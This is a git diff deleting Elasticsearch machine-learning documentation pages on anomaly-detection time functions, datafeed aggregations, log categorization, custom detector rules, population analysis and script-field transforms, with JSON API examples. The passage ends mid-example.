a/docs/reference/ml/anomaly-detection/functions/ml-time-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-time-functions.asciidoc deleted file mode 100644 index 997566e4856..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-time-functions.asciidoc +++ /dev/null @@ -1,105 +0,0 @@ -[role="xpack"] -[[ml-time-functions]] -= Time functions - -The time functions detect events that happen at unusual times, either of the day -or of the week. These functions can be used to find unusual patterns of behavior, -typically associated with suspicious user activity. - -The {ml-features} include the following time functions: - -* <> -* <> - - -[NOTE] -==== -* NOTE: You cannot create forecasts for {anomaly-jobs} that contain time -functions. -* The `time_of_day` function is not aware of the difference between days, for -instance work days and weekends. When modeling different days, use the -`time_of_week` function. In general, the `time_of_week` function is more suited -to modeling the behavior of people rather than machines, as people vary their -behavior according to the day of the week. -* Shorter bucket spans (for example, 10 minutes) are recommended when performing -a `time_of_day` or `time_of_week` analysis. The time of the events being modeled -are not affected by the bucket span, but a shorter bucket span enables quicker -alerting on unusual events. -* Unusual events are flagged based on the previous pattern of the data, not on -what we might think of as unusual based on human experience. So, if events -typically occur between 3 a.m. and 5 a.m., an event occurring at 3 p.m. is -flagged as unusual. -* When Daylight Saving Time starts or stops, regular events can be flagged as -anomalous. This situation occurs because the actual time of the event (as -measured against a UTC baseline) has changed. This situation is treated as a -step change in behavior and the new times will be learned quickly. -==== - -[discrete] -[[ml-time-of-day]] -== Time_of_day - -The `time_of_day` function detects when events occur that are outside normal -usage patterns. For example, it detects unusual activity in the middle of the -night. - -The function expects daily behavior to be similar. If you expect the behavior of -your data to differ on Saturdays compared to Wednesdays, the `time_of_week` -function is more appropriate. - -This function supports the following properties: - -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing events with the time_of_day function -[source,js] --------------------------------------------------- -{ - "function" : "time_of_day", - "by_field_name" : "process" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `time_of_day` function in a detector in your {anomaly-job}, it -models when events occur throughout a day for each process. It detects when an -event occurs for a process that is at an unusual time in the day compared to -its past behavior. - -[discrete] -[[ml-time-of-week]] -== Time_of_week - -The `time_of_week` function detects when events occur that are outside normal -usage patterns. For example, it detects login events on the weekend. - -This function supports the following properties: - -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 2: Analyzing events with the time_of_week function -[source,js] --------------------------------------------------- -{ - "function" : "time_of_week", - "by_field_name" : "eventcode", - "over_field_name" : "workstation" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `time_of_week` function in a detector in your {anomaly-job}, it -models when events occur throughout the week for each `eventcode`. It detects -when a workstation event occurs at an unusual time during the week for that -`eventcode` compared to other workstations. It detects events for a -particular workstation that are outside the normal usage pattern. diff --git a/docs/reference/ml/anomaly-detection/ml-configuring-aggregations.asciidoc b/docs/reference/ml/anomaly-detection/ml-configuring-aggregations.asciidoc deleted file mode 100644 index 7c5f82198c0..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-configuring-aggregations.asciidoc +++ /dev/null @@ -1,330 +0,0 @@ -[role="xpack"] -[[ml-configuring-aggregation]] -= Aggregating data for faster performance - -By default, {dfeeds} fetch data from {es} using search and scroll requests. -It can be significantly more efficient, however, to aggregate data in {es} -and to configure your {anomaly-jobs} to analyze aggregated data. - -One of the benefits of aggregating data this way is that {es} automatically -distributes these calculations across your cluster. You can then feed this -aggregated data into the {ml-features} instead of raw results, which -reduces the volume of data that must be considered while detecting anomalies. - -TIP: If you use a terms aggregation and the cardinality of a term is high, the -aggregation might not be effective and you might want to just use the default -search and scroll behavior. - -[discrete] -[[aggs-limits-dfeeds]] -== Requirements and limitations - -There are some limitations to using aggregations in {dfeeds}. Your aggregation -must include a `date_histogram` aggregation, which in turn must contain a `max` -aggregation on the time field. This requirement ensures that the aggregated data -is a time series and the timestamp of each bucket is the time of the last record -in the bucket. - -IMPORTANT: The name of the aggregation and the name of the field that the agg -operates on need to match, otherwise the aggregation doesn't work. For example, -if you use a `max` aggregation on a time field called `responsetime`, the name -of the aggregation must be also `responsetime`. - -You must also consider the interval of the date histogram aggregation carefully. -The bucket span of your {anomaly-job} must be divisible by the value of the -`calendar_interval` or `fixed_interval` in your aggregation (with no remainder). -If you specify a `frequency` for your {dfeed}, it must also be divisible by this -interval. {anomaly-jobs-cap} cannot use date histograms with an interval -measured in months because the length of the month is not fixed. {dfeeds-cap} -tolerate weeks or smaller units. - -TIP: As a rule of thumb, if your detectors use <> or -<> analytical functions, set the date histogram -aggregation interval to a tenth of the bucket span. This suggestion creates -finer, more granular time buckets, which are ideal for this type of analysis. If -your detectors use <> or <> -functions, set the interval to the same value as the bucket span. - -If your {dfeed} uses aggregations, then the **Anomaly Explorer** in {kib} cannot -plot and display an anomaly chart for the job. If model plot is disabled, then -neither can the **Single Metric Viewer** plot and display the chart for the -{anomaly-job}. This limitation does not apply to single metric jobs that have -aggregations with names that match the fields that they operate on. Refer to -<> for an example. - - -[discrete] -[[aggs-include-jobs]] -== Including aggregations in {anomaly-jobs} - -When you create or update an {anomaly-job}, you can include the names of -aggregations, for example: - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/farequote -{ - "analysis_config": { - "bucket_span": "60m", - "detectors": [{ - "function": "mean", - "field_name": "responsetime", <1> - "by_field_name": "airline" <1> - }], - "summary_count_field_name": "doc_count" - }, - "data_description": { - "time_field":"time" <1> - } -} ----------------------------------- -// TEST[skip:setup:farequote_data] - -<1> The `airline`, `responsetime`, and `time` fields are aggregations. Only the -aggregated fields defined in the `analysis_config` object are analyzed by the -{anomaly-job}. - -NOTE: When the `summary_count_field_name` property is set to a non-null value, -the job expects to receive aggregated input. The property must be set to the -name of the field that contains the count of raw data points that have been -aggregated. It applies to all detectors in the job. - -[[aggs-in-dfeed]] -The aggregations are defined in the {dfeed} as follows: - -[source,console] ----------------------------------- -PUT _ml/datafeeds/datafeed-farequote -{ - "job_id":"farequote", - "indices": ["farequote"], - "aggregations": { - "buckets": { - "date_histogram": { - "field": "time", - "fixed_interval": "360s", - "time_zone": "UTC" - }, - "aggregations": { - "time": { <1> - "max": {"field": "time"} - }, - "airline": { <2> - "terms": { - "field": "airline", - "size": 100 - }, - "aggregations": { - "responsetime": { <3> - "avg": { - "field": "responsetime" - } - } - } - } - } - } - } -} ----------------------------------- -// TEST[skip:setup:farequote_job] - -<1> The aggregations have names that match the fields that they operate on. The -`max` aggregation is named `time` and its field also needs to be `time`. -<2> The `term` aggregation is named `airline` and its field is also named -`airline`. -<3> The `avg` aggregation is named `responsetime` and its field is also named -`responsetime`. - -Your {dfeed} can contain multiple aggregations, but only the ones with names -that match values in the job configuration are fed to the job. - - -[discrete] -[[aggs-dfeeds]] -== Nested aggregations in {dfeeds} - -{dfeeds-cap} support complex nested aggregations. This example uses the -`derivative` pipeline aggregation to find the first order derivative of the -counter `system.network.out.bytes` for each value of the field `beat.name`. - -[source,js] ----------------------------------- -"aggregations": { - "beat.name": { - "terms": { - "field": "beat.name" - }, - "aggregations": { - "buckets": { - "date_histogram": { - "field": "@timestamp", - "fixed_interval": "5m" - }, - "aggregations": { - "@timestamp": { - "max": { - "field": "@timestamp" - } - }, - "bytes_out_average": { - "avg": { - "field": "system.network.out.bytes" - } - }, - "bytes_out_derivative": { - "derivative": { - "buckets_path": "bytes_out_average" - } - } - } - } - } - } -} ----------------------------------- -// NOTCONSOLE - - -[discrete] -[[aggs-single-dfeeds]] -== Single bucket aggregations in {dfeeds} - -{dfeeds-cap} not only supports multi-bucket aggregations, but also single bucket -aggregations. The following shows two `filter` aggregations, each gathering the -number of unique entries for the `error` field. - -[source,js] ----------------------------------- -{ - "job_id":"servers-unique-errors", - "indices": ["logs-*"], - "aggregations": { - "buckets": { - "date_histogram": { - "field": "time", - "interval": "360s", - "time_zone": "UTC" - }, - "aggregations": { - "time": { - "max": {"field": "time"} - } - "server1": { - "filter": {"term": {"source": "server-name-1"}}, - "aggregations": { - "server1_error_count": { - "value_count": { - "field": "error" - } - } - } - }, - "server2": { - "filter": {"term": {"source": "server-name-2"}}, - "aggregations": { - "server2_error_count": { - "value_count": { - "field": "error" - } - } - } - } - } - } - } -} ----------------------------------- -// NOTCONSOLE - - -[discrete] -[[aggs-define-dfeeds]] -== Defining aggregations in {dfeeds} - -When you define an aggregation in a {dfeed}, it must have the following form: - -[source,js] ----------------------------------- -"aggregations": { - ["bucketing_aggregation": { - "bucket_agg": { - ... - }, - "aggregations": {] - "data_histogram_aggregation": { - "date_histogram": { - "field": "time", - }, - "aggregations": { - "timestamp": { - "max": { - "field": "time" - } - }, - [,"": { - "terms":{... - } - [,"aggregations" : { - []+ - } ] - }] - } - } - } - } -} ----------------------------------- -// NOTCONSOLE - -The top level aggregation must be either a -{ref}/search-aggregations-bucket.html[bucket aggregation] containing as single -sub-aggregation that is a `date_histogram` or the top level aggregation is the -required `date_histogram`. There must be exactly one `date_histogram` -aggregation. For more information, see -{ref}/search-aggregations-bucket-datehistogram-aggregation.html[Date histogram aggregation]. - -NOTE: The `time_zone` parameter in the date histogram aggregation must be set to -`UTC`, which is the default value. - -Each histogram bucket has a key, which is the bucket start time. This key cannot -be used for aggregations in {dfeeds}, however, because they need to know the -time of the latest record within a bucket. Otherwise, when you restart a -{dfeed}, it continues from the start time of the histogram bucket and possibly -fetches the same data twice. The max aggregation for the time field is therefore -necessary to provide the time of the latest record within a bucket. - -You can optionally specify a terms aggregation, which creates buckets for -different values of a field. - -IMPORTANT: If you use a terms aggregation, by default it returns buckets for -the top ten terms. Thus if the cardinality of the term is greater than 10, not -all terms are analyzed. - -You can change this behavior by setting the `size` parameter. To -determine the cardinality of your data, you can run searches such as: - -[source,js] --------------------------------------------------- -GET .../_search -{ - "aggs": { - "service_cardinality": { - "cardinality": { - "field": "service" - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -By default, {es} limits the maximum number of terms returned to 10000. For high -cardinality fields, the query might not run. It might return errors related to -circuit breaking exceptions that indicate that the data is too large. In such -cases, do not use aggregations in your {dfeed}. For more information, see -{ref}/search-aggregations-bucket-terms-aggregation.html[Terms aggregation]. - -You can also optionally specify multiple sub-aggregations. The sub-aggregations -are aggregated for the buckets that were created by their parent aggregation. -For more information, see {ref}/search-aggregations.html[Aggregations]. diff --git a/docs/reference/ml/anomaly-detection/ml-configuring-categories.asciidoc b/docs/reference/ml/anomaly-detection/ml-configuring-categories.asciidoc deleted file mode 100644 index 0334e2603f6..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-configuring-categories.asciidoc +++ /dev/null @@ -1,262 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-configuring-categories]] -= Detecting anomalous categories of data - -Categorization is a {ml} process that tokenizes a text field, clusters similar -data together, and classifies it into categories. It works best on -machine-written messages and application output that typically consist of -repeated elements. For example, it works well on logs that contain a finite set -of possible messages: - -//Obtained from it_ops_new_app_logs.json -[source,js] ----------------------------------- -{"@timestamp":1549596476000, -"message":"org.jdbi.v2.exceptions.UnableToExecuteStatementException: com.mysql.jdbc.exceptions.MySQLTimeoutException: Statement cancelled due to timeout or client request [statement:\"SELECT id, customer_id, name, force_disabled, enabled FROM customers\"]", -"type":"logs"} ----------------------------------- -//NOTCONSOLE - -Categorization is tuned to work best on data like log messages by taking token -order into account, including stop words, and not considering synonyms in its -analysis. Complete sentences in human communication or literary text (for -example email, wiki pages, prose, or other human-generated content) can be -extremely diverse in structure. Since categorization is tuned for machine data, -it gives poor results for human-generated data. It would create so many -categories that they couldn't be handled effectively. Categorization is _not_ -natural language processing (NLP). - -When you create a categorization {anomaly-job}, the {ml} model learns what -volume and pattern is normal for each category over time. You can then detect -anomalies and surface rare events or unusual types of messages by using -<> or <> functions. - -In {kib}, there is a categorization wizard to help you create this type of -{anomaly-job}. For example, the following job generates categories from the -contents of the `message` field and uses the count function to determine when -certain categories are occurring at anomalous rates: - -[role="screenshot"] -image::images/ml-category-wizard.jpg["Creating a categorization job in Kibana"] - -[%collapsible] -.API example -==== -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/it_ops_app_logs -{ - "description" : "IT ops application logs", - "analysis_config" : { - "categorization_field_name": "message",<1> - "bucket_span":"30m", - "detectors" :[{ - "function":"count", - "by_field_name": "mlcategory"<2> - }] - }, - "data_description" : { - "time_field":"@timestamp" - } -} ----------------------------------- -// TEST[skip:needs-licence] -<1> This field is used to derive categories. -<2> The categories are used in a detector by setting `by_field_name`, -`over_field_name`, or `partition_field_name` to the keyword `mlcategory`. If you -do not specify this keyword in one of those properties, the API request fails. -==== - - -You can use the **Anomaly Explorer** in {kib} to view the analysis results: - -[role="screenshot"] -image::images/ml-category-anomalies.jpg["Categorization results in the Anomaly Explorer"] - -For this type of job, the results contain extra information for each anomaly: -the name of the category (for example, `mlcategory 2`) and examples of the -messages in that category. You can use these details to investigate occurrences -of unusually high message counts. - -If you use the advanced {anomaly-job} wizard in {kib} or the -{ref}/ml-put-job.html[create {anomaly-jobs} API], there are additional -configuration options. For example, the optional `categorization_examples_limit` -property specifies the maximum number of examples that are stored in memory and -in the results data store for each category. The default value is `4`. Note that -this setting does not affect the categorization; it just affects the list of -visible examples. If you increase this value, more examples are available, but -you must have more storage available. If you set this value to `0`, no examples -are stored. - -Another advanced option is the `categorization_filters` property, which can -contain an array of regular expressions. If a categorization field value matches -the regular expression, the portion of the field that is matched is not taken -into consideration when defining categories. The categorization filters are -applied in the order they are listed in the job configuration, which enables you -to disregard multiple sections of the categorization field value. In this -example, you might create a filter like `[ "\\[statement:.*\\]"]` to remove the -SQL statement from the categorization algorithm. - -[discrete] -[[ml-per-partition-categorization]] -== Per-partition categorization - -If you enable per-partition categorization, categories are determined -independently for each partition. For example, if your data includes messages -from multiple types of logs from different applications, you can use a field -like the ECS {ecs-ref}/ecs-event.html[`event.dataset` field] as the -`partition_field_name` and categorize the messages for each type of log -separately. - -If your job has multiple detectors, every detector that uses the `mlcategory` -keyword must also define a `partition_field_name`. You must use the same -`partition_field_name` value in all of these detectors. Otherwise, when you -create or update a job and enable per-partition categorization, it fails. - -When per-partition categorization is enabled, you can also take advantage of a -`stop_on_warn` configuration option. If the categorization status for a -partition changes to `warn`, it doesn't categorize well and can cause a lot of -unnecessary resource usage. When you set `stop_on_warn` to `true`, the job stops -analyzing these problematic partitions. You can thus avoid an ongoing -performance cost for partitions that are unsuitable for categorization. - -[discrete] -[[ml-configuring-analyzer]] -== Customizing the categorization analyzer - -Categorization uses English dictionary words to identify log message categories. -By default, it also uses English tokenization rules. For this reason, if you use -the default categorization analyzer, only English language log messages are -supported, as described in the <>. - -If you use the categorization wizard in {kib}, you can see which categorization -analyzer it uses and highlighted examples of the tokens that it identifies. You -can also change the tokenization rules by customizing the way the categorization -field values are interpreted: - -[role="screenshot"] -image::images/ml-category-analyzer.jpg["Editing the categorization analyzer in Kibana"] - -The categorization analyzer can refer to a built-in {es} analyzer or a -combination of zero or more character filters, a tokenizer, and zero or more -token filters. In this example, adding a -{ref}/analysis-pattern-replace-charfilter.html[`pattern_replace` character filter] -achieves exactly the same behavior as the `categorization_filters` job -configuration option described earlier. For more details about these properties, -see the -{ref}/ml-put-job.html#ml-put-job-request-body[`categorization_analyzer` API object]. - -If you use the default categorization analyzer in {kib} or omit the -`categorization_analyzer` property from the API, the following default values -are used: - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/_validate -{ - "analysis_config" : { - "categorization_analyzer" : { - "tokenizer" : "ml_classic", - "filter" : [ - { "type" : "stop", "stopwords": [ - "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday", - "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun", - "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December", - "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec", - "GMT", "UTC" - ] } - ] - }, - "categorization_field_name": "message", - "detectors" :[{ - "function":"count", - "by_field_name": "mlcategory" - }] - }, - "data_description" : { - } -} --------------------------------------------------- - -If you specify any part of the `categorization_analyzer`, however, any omitted -sub-properties are _not_ set to default values. - -The `ml_classic` tokenizer and the day and month stopword filter are more or -less equivalent to the following analyzer, which is defined using only built-in -{es} {ref}/analysis-tokenizers.html[tokenizers] and -{ref}/analysis-tokenfilters.html[token filters]: - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/it_ops_new_logs3 -{ - "description" : "IT Ops Application Logs", - "analysis_config" : { - "categorization_field_name": "message", - "bucket_span":"30m", - "detectors" :[{ - "function":"count", - "by_field_name": "mlcategory", - "detector_description": "Unusual message counts" - }], - "categorization_analyzer":{ - "tokenizer": { - "type" : "simple_pattern_split", - "pattern" : "[^-0-9A-Za-z_.]+" <1> - }, - "filter": [ - { "type" : "pattern_replace", "pattern": "^[0-9].*" }, <2> - { "type" : "pattern_replace", "pattern": "^[-0-9A-Fa-f.]+$" }, <3> - { "type" : "pattern_replace", "pattern": "^[^0-9A-Za-z]+" }, <4> - { "type" : "pattern_replace", "pattern": "[^0-9A-Za-z]+$" }, <5> - { "type" : "stop", "stopwords": [ - "", - "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday", - "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun", - "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December", - "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec", - "GMT", "UTC" - ] } - ] - } - }, - "analysis_limits":{ - "categorization_examples_limit": 5 - }, - "data_description" : { - "time_field":"time", - "time_format": "epoch_ms" - } -} ----------------------------------- -// TEST[skip:needs-licence] - -<1> Tokens basically consist of hyphens, digits, letters, underscores and dots. -<2> By default, categorization ignores tokens that begin with a digit. -<3> By default, categorization also ignores tokens that are hexadecimal numbers. -<4> Underscores, hyphens, and dots are removed from the beginning of tokens. -<5> Underscores, hyphens, and dots are also removed from the end of tokens. - -The key difference between the default `categorization_analyzer` and this -example analyzer is that using the `ml_classic` tokenizer is several times -faster. The difference in behavior is that this custom analyzer does not include -accented letters in tokens whereas the `ml_classic` tokenizer does, although -that could be fixed by using more complex regular expressions. - -If you are categorizing non-English messages in a language where words are -separated by spaces, you might get better results if you change the day or month -words in the stop token filter to the appropriate words in your language. If you -are categorizing messages in a language where words are not separated by spaces, -you must use a different tokenizer as well in order to get sensible -categorization results. - -It is important to be aware that analyzing for categorization of machine -generated log messages is a little different from tokenizing for search. -Features that work well for search, such as stemming, synonym substitution, and -lowercasing are likely to make the results of categorization worse. However, in -order for drill down from {ml} results to work correctly, the tokens that the -categorization analyzer produces must be similar to those produced by the search -analyzer. If they are sufficiently similar, when you search for the tokens that -the categorization analyzer produces then you find the original document that -the categorization field value came from. diff --git a/docs/reference/ml/anomaly-detection/ml-configuring-detector-custom-rules.asciidoc b/docs/reference/ml/anomaly-detection/ml-configuring-detector-custom-rules.asciidoc deleted file mode 100644 index c8f1e3b5479..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-configuring-detector-custom-rules.asciidoc +++ /dev/null @@ -1,238 +0,0 @@ -[role="xpack"] -[[ml-configuring-detector-custom-rules]] -= Customizing detectors with custom rules - -<> enable you to change the behavior of anomaly -detectors based on domain-specific knowledge. - -Custom rules describe _when_ a detector should take a certain _action_ instead -of following its default behavior. To specify the _when_ a rule uses -a `scope` and `conditions`. You can think of `scope` as the categorical -specification of a rule, while `conditions` are the numerical part. -A rule can have a scope, one or more conditions, or a combination of -scope and conditions. For the full list of specification details, see the -{ref}/ml-put-job.html#put-customrules[`custom_rules` object] in the create -{anomaly-jobs} API. - -[[ml-custom-rules-scope]] -== Specifying custom rule scope - -Let us assume we are configuring an {anomaly-job} in order to detect DNS data -exfiltration. Our data contain fields "subdomain" and "highest_registered_domain". -We can use a detector that looks like -`high_info_content(subdomain) over highest_registered_domain`. If we run such a -job, it is possible that we discover a lot of anomalies on frequently used -domains that we have reasons to trust. As security analysts, we are not -interested in such anomalies. Ideally, we could instruct the detector to skip -results for domains that we consider safe. Using a rule with a scope allows us -to achieve this. - -First, we need to create a list of our safe domains. Those lists are called -_filters_ in {ml}. Filters can be shared across {anomaly-jobs}. - -You can create a filter in **Anomaly Detection > Settings > Filter Lists** in -{kib} or by using the {ref}/ml-put-filter.html[put filter API]: - -[source,console] ----------------------------------- -PUT _ml/filters/safe_domains -{ - "description": "Our list of safe domains", - "items": ["safe.com", "trusted.com"] -} ----------------------------------- -// TEST[skip:needs-licence] - -Now, we can create our {anomaly-job} specifying a scope that uses the -`safe_domains` filter for the `highest_registered_domain` field: - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/dns_exfiltration_with_rule -{ - "analysis_config" : { - "bucket_span":"5m", - "detectors" :[{ - "function":"high_info_content", - "field_name": "subdomain", - "over_field_name": "highest_registered_domain", - "custom_rules": [{ - "actions": ["skip_result"], - "scope": { - "highest_registered_domain": { - "filter_id": "safe_domains", - "filter_type": "include" - } - } - }] - }] - }, - "data_description" : { - "time_field":"timestamp" - } -} ----------------------------------- -// TEST[skip:needs-licence] - -As time advances and we see more data and more results, we might encounter new -domains that we want to add in the filter. We can do that in the -**Anomaly Detection > Settings > Filter Lists** in {kib} or by using the -{ref}/ml-update-filter.html[update filter API]: - -[source,console] ----------------------------------- -POST _ml/filters/safe_domains/_update -{ - "add_items": ["another-safe.com"] -} ----------------------------------- -// TEST[skip:setup:ml_filter_safe_domains] - -Note that we can use any of the `partition_field_name`, `over_field_name`, or -`by_field_name` fields in the `scope`. - -In the following example we scope multiple fields: - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/scoping_multiple_fields -{ - "analysis_config" : { - "bucket_span":"5m", - "detectors" :[{ - "function":"count", - "partition_field_name": "my_partition", - "over_field_name": "my_over", - "by_field_name": "my_by", - "custom_rules": [{ - "actions": ["skip_result"], - "scope": { - "my_partition": { - "filter_id": "filter_1" - }, - "my_over": { - "filter_id": "filter_2" - }, - "my_by": { - "filter_id": "filter_3" - } - } - }] - }] - }, - "data_description" : { - "time_field":"timestamp" - } -} ----------------------------------- -// TEST[skip:needs-licence] - -Such a detector will skip results when the values of all 3 scoped fields -are included in the referenced filters. - -[[ml-custom-rules-conditions]] -== Specifying custom rule conditions - -Imagine a detector that looks for anomalies in CPU utilization. -Given a machine that is idle for long enough, small movement in CPU could -result in anomalous results where the `actual` value is quite small, for -example, 0.02. Given our knowledge about how CPU utilization behaves we might -determine that anomalies with such small actual values are not interesting for -investigation. - -Let us now configure an {anomaly-job} with a rule that will skip results where -CPU utilization is less than 0.20. - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/cpu_with_rule -{ - "analysis_config" : { - "bucket_span":"5m", - "detectors" :[{ - "function":"high_mean", - "field_name": "cpu_utilization", - "custom_rules": [{ - "actions": ["skip_result"], - "conditions": [ - { - "applies_to": "actual", - "operator": "lt", - "value": 0.20 - } - ] - }] - }] - }, - "data_description" : { - "time_field":"timestamp" - } -} ----------------------------------- -// TEST[skip:needs-licence] - -When there are multiple conditions they are combined with a logical `and`. -This is useful when we want the rule to apply to a range. We simply create -a rule with two conditions, one for each end of the desired range. - -Here is an example where a count detector will skip results when the count -is greater than 30 and less than 50: - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/rule_with_range -{ - "analysis_config" : { - "bucket_span":"5m", - "detectors" :[{ - "function":"count", - "custom_rules": [{ - "actions": ["skip_result"], - "conditions": [ - { - "applies_to": "actual", - "operator": "gt", - "value": 30 - }, - { - "applies_to": "actual", - "operator": "lt", - "value": 50 - } - ] - }] - }] - }, - "data_description" : { - "time_field":"timestamp" - } -} ----------------------------------- -// TEST[skip:needs-licence] - -[[ml-custom-rules-lifecycle]] -== Custom rules in the lifecycle of a job - -Custom rules only affect results created after the rules were applied. -Let us imagine that we have configured an {anomaly-job} and it has been running -for some time. After observing its results we decide that we can employ -rules in order to get rid of some uninteresting results. We can use -the {ref}/ml-update-job.html[update {anomaly-job} API] to do so. However, the -rule we added will only be in effect for any results created from the moment we -added the rule onwards. Past results will remain unaffected. - -[[ml-custom-rules-filtering]] -== Using custom rules vs. filtering data - -It might appear like using rules is just another way of filtering the data -that feeds into an {anomaly-job}. For example, a rule that skips results when -the partition field value is in a filter sounds equivalent to having a query -that filters out such documents. But it is not. There is a fundamental -difference. When the data is filtered before reaching a job it is as if they -never existed for the job. With rules, the data still reaches the job and -affects its behavior (depending on the rule actions). - -For example, a rule with the `skip_result` action means all data will still -be modeled. On the other hand, a rule with the `skip_model_update` action means -results will still be created even though the model will not be updated by -data matched by a rule. diff --git a/docs/reference/ml/anomaly-detection/ml-configuring-populations.asciidoc b/docs/reference/ml/anomaly-detection/ml-configuring-populations.asciidoc deleted file mode 100644 index 907d1ca6bf7..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-configuring-populations.asciidoc +++ /dev/null @@ -1,87 +0,0 @@ -[role="xpack"] -[[ml-configuring-populations]] -= Performing population analysis - -Entities or events in your data can be considered anomalous when: - -* Their behavior changes over time, relative to their own previous behavior, or -* Their behavior is different than other entities in a specified population. - -The latter method of detecting outliers is known as _population analysis_. The -{ml} analytics build a profile of what a "typical" user, machine, or other entity -does over a specified time period and then identify when one is behaving -abnormally compared to the population. - -This type of analysis is most useful when the behavior of the population as a -whole is mostly homogeneous and you want to identify outliers. In general, -population analysis is not useful when members of the population inherently -have vastly different behavior. You can, however, segment your data into groups -that behave similarly and run these as separate jobs. For example, you can use a -query filter in the {dfeed} to segment your data or you can use the -`partition_field_name` to split the analysis for the different groups. - -Population analysis scales well and has a lower resource footprint than -individual analysis of each series. For example, you can analyze populations -of hundreds of thousands or millions of entities. - -To specify the population, use the `over_field_name` property. For example: - -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/population -{ - "description" : "Population analysis", - "analysis_config" : { - "bucket_span":"15m", - "influencers": [ - "clientip" - ], - "detectors": [ - { - "function": "mean", - "field_name": "bytes", - "over_field_name": "clientip" <1> - } - ] - }, - "data_description" : { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} ----------------------------------- -// TEST[skip:needs-licence] - -<1> This `over_field_name` property indicates that the metrics for each client ( - as identified by their IP address) are analyzed relative to other clients - in each bucket. - -If your data is stored in {es}, you can use the population job wizard in {kib} -to create an {anomaly-job} with these same properties. For example, if you add -the sample web logs in {kib}, you can use the following job settings in the -population job wizard: - -[role="screenshot"] -image::images/ml-population-job.png["Job settings in the population job wizard] - -After you open the job and start the {dfeed} or supply data to the job, you can -view the results in {kib}. For example, you can view the results in the -**Anomaly Explorer**: - -[role="screenshot"] -image::images/ml-population-results.png["Population analysis results in the Anomaly Explorer"] - -As in this case, the results are often quite sparse. There might be just a few -data points for the selected time period. Population analysis is particularly -useful when you have many entities and the data for specific entitles is sporadic -or sparse. - -If you click on a section in the timeline or swim lanes, you can see more -details about the anomalies: - -[role="screenshot"] -image::images/ml-population-anomaly.png["Anomaly details for a specific user"] - -In this example, the client IP address `30.156.16.164` received a low volume of -bytes on the date and time shown. This event is anomalous because the mean is -three times lower than the expected behavior of the population. diff --git a/docs/reference/ml/anomaly-detection/ml-configuring-transform.asciidoc b/docs/reference/ml/anomaly-detection/ml-configuring-transform.asciidoc deleted file mode 100644 index 3c1b0c98017..00000000000 --- a/docs/reference/ml/anomaly-detection/ml-configuring-transform.asciidoc +++ /dev/null @@ -1,587 +0,0 @@ -[role="xpack"] -[[ml-configuring-transform]] -= Transforming data with script fields - -If you use {dfeeds}, you can add scripts to transform your data before -it is analyzed. {dfeeds-cap} contain an optional `script_fields` property, where -you can specify scripts that evaluate custom expressions and return script -fields. - -If your {dfeed} defines script fields, you can use those fields in your -{anomaly-job}. For example, you can use the script fields in the analysis -functions in one or more detectors. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -The following index APIs create and add content to an index that is used in -subsequent examples: - -[source,console] ----------------------------------- -PUT /my-index-000001 -{ - "mappings":{ - "properties": { - "@timestamp": { - "type": "date" - }, - "aborted_count": { - "type": "long" - }, - "another_field": { - "type": "keyword" <1> - }, - "clientip": { - "type": "keyword" - }, - "coords": { - "properties": { - "lat": { - "type": "keyword" - }, - "lon": { - "type": "keyword" - } - } - }, - "error_count": { - "type": "long" - }, - "query": { - "type": "keyword" - }, - "some_field": { - "type": "keyword" - }, - "tokenstring1":{ - "type":"keyword" - }, - "tokenstring2":{ - "type":"keyword" - }, - "tokenstring3":{ - "type":"keyword" - } - } - } -} - -PUT /my-index-000001/_doc/1 -{ - "@timestamp":"2017-03-23T13:00:00", - "error_count":36320, - "aborted_count":4156, - "some_field":"JOE", - "another_field":"SMITH ", - "tokenstring1":"foo-bar-baz", - "tokenstring2":"foo bar baz", - "tokenstring3":"foo-bar-19", - "query":"www.ml.elastic.co", - "clientip":"123.456.78.900", - "coords": { - "lat" : 41.44, - "lon":90.5 - } -} ----------------------------------- -// TEST[skip:SETUP] - -<1> In this example, string fields are mapped as `keyword` fields to support -aggregation. If you want both a full text (`text`) and a keyword (`keyword`) -version of the same field, use multi-fields. For more information, see -{ref}/multi-fields.html[fields]. - -[[ml-configuring-transform1]] -.Example 1: Adding two numerical fields -[source,console] ----------------------------------- -PUT _ml/anomaly_detectors/test1 -{ - "analysis_config":{ - "bucket_span": "10m", - "detectors":[ - { - "function":"mean", - "field_name": "total_error_count", <1> - "detector_description": "Custom script field transformation" - } - ] - }, - "data_description": { - "time_field":"@timestamp", - "time_format":"epoch_ms" - } -} - -PUT 